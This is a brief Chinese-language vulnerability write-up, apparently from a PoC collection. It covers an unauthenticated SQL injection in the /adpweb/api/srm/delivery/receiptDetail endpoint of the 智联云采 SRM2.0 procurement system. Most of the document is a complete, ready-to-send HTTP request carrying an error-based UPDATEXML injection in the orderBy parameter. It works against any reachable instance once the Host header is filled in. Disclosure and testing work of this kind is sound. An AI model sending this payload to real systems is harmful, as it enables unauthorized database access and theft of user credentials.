漏洞描述
智联云采 SRM2.0 是一款针对企业供应链采购管理难题及数字化转型需求的产品。该产品依托人工智能、物联网、大数据、云等前沿技术,帮助企业实现更具预测性的战略寻源、更具前瞻性的供应商管理和更具自动性的采购执行。该产品的 receiptDetail 接口存在 SQL 注入漏洞,未经身份认证的攻击者可获取用户名、密码等敏感信息。
智联云采 SRM2.0 /adpweb/api/srm/delivery/receiptDetail SQL 注入漏洞
PoC代码
GET /adpweb/api/srm/delivery/receiptDetail?orderBy=%28UPDATEXML%288058%2CCONCAT('1',CONCAT('euzmzzgonz',%20'-'),%20'wvgccfjtpe')%2C3521%29%29 HTTP/1.1
Host:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Cookie:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.106 Safari/537.36